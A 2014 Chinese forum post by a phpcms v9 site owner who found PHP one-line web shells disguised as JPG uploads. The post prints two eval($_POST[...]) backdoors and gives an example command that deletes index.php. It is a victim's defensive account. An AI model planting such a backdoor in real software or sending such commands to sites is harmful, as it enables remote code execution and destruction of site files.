热搜词
发表于 2014-3-27 17:00:34 | 显示全部楼层 |阅读模式
使用phpcms v9建的网站,最近在检查网站uploadfile目录时,发现uploadfile目录中有通过图片上传的一句话木马,如图:
002.jpg

003.jpg

001.jpg

uploadfile_userup目录内图片一句话木马.jpg

000.jpg

其中这些图片文件其实都是脚本文件,其中 "thumb_6_6_..JPG”  文件无法通过ftp下载,也无法在线重命名或删除,用记事本打开后,发现是一句话木马,代码如下:
<?php @eval($_POST['xx']);?>
另一个代码是:
<?php @eval($_POST['ln']);?>

004.jpg

$_POST['xx']);是获取post变量
而eval是一个php函数,他可以将字符串中的符合php语法的字符当做php代码进行执行

假如他在表单域中写上:unlink('index.php')
然后发送给这个文件,那么,你的index.php将被删除


相关链接:
http://www.it0527.com/thread-9739-1-1.html



全部评论0
回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-9-20 09:11 , Processed in 0.189813 second(s), 29 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team